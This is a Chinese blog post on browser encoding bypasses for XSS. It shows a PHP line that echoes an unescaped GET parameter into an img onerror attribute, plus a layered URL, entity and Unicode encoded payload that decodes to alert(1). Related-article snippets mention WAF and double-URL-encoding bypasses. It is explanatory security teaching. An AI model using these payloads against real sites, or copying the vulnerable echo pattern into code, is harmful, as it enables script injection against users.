浏览器编码绕过

最新推荐文章于 2022-11-30 09:55:27 发布
最新推荐文章于 2022-11-30 09:55:27 发布
阅读量489 收藏
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/superprintf/article/details/111468978
版权

实例

页面有如下标签
<?php echo '<img src=x onerror='.$_GET['input'].'>'; ?>
这时输入如下,实现弹窗

input=%26%23x5C;%26%23x75;%26%23x30;%26%23x30;%26%23x36;%26%23x31;%26%23x5C;%26%23x75;%26%23x30;%26%23x30;%26%23x36;%26%23x63;%26%23x5C;%26%23x75;%26%23x30;%26%23x30;%26%23x36;%26%23x35;%26%23x5C;%26%23x75;%26%23x30;%26%23x30;%26%23x37;%26%23x32;%26%23x5C;%26%23x75;%26%23x30;%26%23x30;%26%23x37;%26%23x34;(1)

解析

alert的unicode编码->\u0061\u006c\u0065\u0072\u0074
再进行实体编码:

&#x5C;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5C;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5C;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5C;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5C;&#x75;&#x30;&#x30;&#x37;&#x34;

最后进行url编码:

%26%23x5C;%26%23x75;%26%23x30;%26%23x30;%26%23x36;%26%23x31;%26%23x5C;%26%23x75;%26%23x30;%26%23x30;%26%23x36;%26%23x63;%26%23x5C;%26%23x75;%26%23x30;%26%23x30;%26%23x36;%26%23x35;%26%23x5C;%26%23x75;%26%23x30;%26%23x30;%26%23x37;%26%23x32;%26%23x5C;%26%23x75;%26%23x30;%26%23x30;%26%23x37;%26%23x34;

当从url输入这一长串时后端服务器先urldecode变成实体编码放在了
<img src=x onerror='.$_GET['input'].'>
变成
<img src=x onerror='&#x5C;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5C;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5C;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5C;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5C;&#x75;&#x30;&#x30;&#x37;&#x34;(1)'>
输出到浏览器上,浏览器的渲染引擎将实体解码成
<img src=x onerror='\u0061\u006c\u0065\u0072\u0074(1)'>
最后onerror触发js解析器解码成
<img src=x onerror='alert(1)'>

原理探索

url编码与解码原理

RFC3986文档规定,Url中只允许包含英文字母(a-zA-Z)、数字(0-9)、-_.~4个特殊字符以及所有保留字符,如果想在url中输入除了以上的字符就需要URL编码
RFC3986中指定了以下字符为保留字符:! * ' ( ) ; : @ & = + $ , / ? # [ ]
只有普通英文字符和数字,特殊字符$-_.+!*'()还有保留字符,才能出现在未经编码的Url之中
但是数据中包含特殊字符或者保留字时仍然需要编码–>

http请求(GET/POST)时,url/参数编码的过程分析

url输入->urlencode(utf-8)->全部转变成二进制传输->服务器将二进制转换成url编码的形式->urldecode成原始输入

unicode和utf-8–阮一峰

unicode用二进制存储了所有符号,而utf-8则是使用并按照特定方式修改unicode,从而应用到具体的编码方案中。

javascript伪协议

href是属性,需要通过伪协议javascript来执行js代码
onerror是事件,本身就可执行js代码

3.长文-浏览器的工作原理:新式网络浏览器幕后揭秘

引用:
编码与解码,浏览器都做了什么

小健健健
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xssbypass_【渗透技巧】XSS三重URL编码绕过实例
weixin_30126409的博客
12-23 3942
0x00 前言跨站脚本攻击(Cross Site Scripting),缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在黑盒渗透中,XSS在很多网站中普遍存在,这边分享一个简单有意思的XSS三重URL编码绕过漏洞实例。0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双...
URL编码与解码
尹自强.DoSomething()
03-11 963
通常如果一样东西需要编码,说明这样东西并不适合传输。原因多种多样,如Size过大,包含隐私数据,对于Url来说,之所以要进行编码,是因为Url中有些字符会引起歧义。   例如,Url参数字符串中使用key=value键值对这样的形式来传参,键值对之间以&符号分隔,如/s?q=abc&ie=utf-8。如果你的value字符串中包含了=或者&,那么势必会造成接收Url的服务器解析错误,因此必须将引
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 5567
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
深入讲解XSS利用编码绕过的原理
<XiaoHai>的博客
08-17 1868
xss
iwebsec靶场 SQL注入漏洞通关笔记10- 双重url编码绕过
mooyuan的博客
11-30 2888
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第10关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的第10关卡过滤了select关键字并且进行了双重url解码了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的双重url解码型注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
浅谈浏览器编码与解码过程
一个安全研究员
09-13 1万+
浏览器是如何解码的 无论是作为开发,还是作为黑客,企图从Web 端注入SQL,或者是XSS 的时候,编码和解码都是一个重要的问题、作为一个浏览器,有URL解析引擎,有HTML解析引擎,还有JS 解析引擎。其执行的先后顺序往往决定了输出的结果。这种多标签语言互相嵌入的,同时又需要客户端服务器交互的技术,正是给了XSS 可趁之机。下面我们要做的,是去了解浏览器到底如何解码,该如何在解码过程中避免漏洞的产生。在此之上,我更愿意揭开整个浏览器的工作流程,了解其本质。
第04篇:XSS三重URL编码绕过实例1
08-03
本文主要探讨了一个XSS三重URL编码绕过的实例,揭示了在某些情况下,简单的防御措施可能不足以阻止攻击。 首先,我们要理解XSS的基本概念。XSS攻击通常发生在Web应用程序未能正确过滤或转义用户输入的情况下。当...
XSSBypass:XSS绕过技术
05-17
攻击者可以通过编码、字符集转换、使用特殊字符、或者利用过滤器的逻辑漏洞来绕过防御。 - 例如,使用HTML实体编码、Base64编码URL编码等可以避开部分过滤规则。 3. **XSS攻击的危害** - 盗取用户cookie,实现...
记录几种XSS绕过方式1
08-03
6. 编码绕过: 当过滤器限制了`alert`, `prompt`等弹窗函数时,攻击者可以使用各种编码形式来替代。例如,使用十六进制编码`javascript:alert%281%29`,或者Unicode编码`javascript:alert\u00281\u0029`,甚至HTML...
Pyhon3相关词爬虫脚本下载 绕过安全验证,亲测,有效
02-11
在这个项目中,我们探讨的是一个Python3编写的爬虫脚本,该脚本能够绕过安全验证,有效地从互联网上抓取特定网站(如百度)的相关关键词数据。 爬虫的基本概念是模拟人类用户的行为,自动地在网页间导航,抓取所需...
第十节 绕过过滤domain为空的XSS-01
09-15
- **编码绕过**: 使用不同的编码方式来隐藏或变形恶意字符,使得它们能逃过过滤。例如,使用HTML实体编码URL编码或Base64编码。在上述案例中,使用Base64编码的payload为:`"><script>eval(atob('YWxlcnQoZG9jdW1...
xss编码小结
weixin_33966095的博客
01-24 129
一、JS编码与HTML编码区分: HTML实体可以使用十进制与十六进制编码;javascript可以使用Unicode与八进制与十六进制进行编码。 二、编码原理区分: 三、编码与非编码 对于JS编码: 1.&lt;script&gt;eval("\u0061\u006c\u0065\u0072\u0074\u0028\u002f\u0078\u0073\u0073\u002f\u00...
搭建漏洞环境及实操
zzzzzzcq的博客
04-07 378
什么是WAF? WEB应用防火墙 (Web Application Firewall) 定义:通过执行一系列针对HTTP/HTTPS的安全策略来防御对Web应用的攻击。 WAF绕过方法 1. 大小写混合 在规则匹配时只针对了特定大写或特定小写的情况,在实战中可以通过混合大小写的方式进行绕过(现在几乎没有这样的情况),如下所示。 uNion sElEct 1,2,3,4,5 2.URL编码 极少部分的 WAF 不会对普通字符进行 URL 解码,如下所示。union select 1,2,3,4,...
XSS编码绕过原理
m0_67348334的博客
02-25 353
浏览器在解析一篇HTML文档时,一般顺序为HTML解析→URL解析→JavaScript解析
XSS三重URL编码绕过实例
04-11 919
遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出: 双引号被转义了,我们对双引号进行URL双重编码,再看一下输出: 依然被转义了,我们再加一层URL编码,即三重url编码,再看一下输出: URL编码被还原为双引号,并带入到html中输入。构造Payload实现弹窗 转载于:https://www.cnblogs.com/xiaozi/p/8793...
URL编码原理及对照表
热门推荐
jCuckoo的专栏
11-10 2万+
url编码是一种浏览器用来打包表单输入的格式。 浏览器从表单中获取所有的name和其中的值 ,将它们以name/value参数编码(移去那些不能传送的字符, 将数据排行等等)作为URL的一部分或者分离地发给服务器。不管哪种情况, 在服务器端的表单输入格式样子象这样: theName=Ichabod+Crane&gender=male&status=missing&headless=yes URL
请求编码、响应编码URL编码的原理
错觉
12-10 5704
1 请求编码 1.1 直接在地址栏中给出中文 请求数据是由客户端浏览器发送服务器的,请求数据的编码是由浏览器决定的。例如在浏览器地址栏中给出:http://localhost:8080/hello/AServlet?name=传智,那么其中“传智”是什么编码的呢?不同浏览器使用不同的编码,所以这是不确定的! IE:使用GB2312;   FireFox:使用GB2312;
URL编码原理详解
lynnjinglei的专栏
04-01 1510
如果URL中含有非ASCII字符的话, 浏览器会对URL进行URL_ENCODE, 然后发送给服务器. URL_ENCODE的过程就是把URL作为字符按照某种编码方式(GBK, UTF-8等)编码成二进制的字节码,然后每个字节用一个包含3个字符的字符串 "%xy" 表示,其中xy为该字节的两位十六进制表示形式。     URLencode到底按照那种编码方式对字符编码?这里就是浏览器的事
mysql利用双重url编码绕过防火墙
一个码农的笔记
10-17 1986
例子: http://www.gzidc.org/search/ post 的数据: keyword=a 如果单纯的在搜索框中输入:select , union,detele,' 那么就会被waf阻拦页面会显示:非法字符 如果用双重编码url替换注入语句那么,waf就不会拦截 下面我写了一个程序来讲普通的注入语句转换为双重url编码: import stri
xss之PHP_SELF绕过
最新发布
03-29
一种常见的绕过方式是通过在URL中注入恶意的脚本代码。 为了防止XSS攻击,我们应该对用户输入进行严格的过滤和验证,并使用适当的编码方式来输出数据。在处理用户输入时,可以使用函数如htmlspecialchars()来转义...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值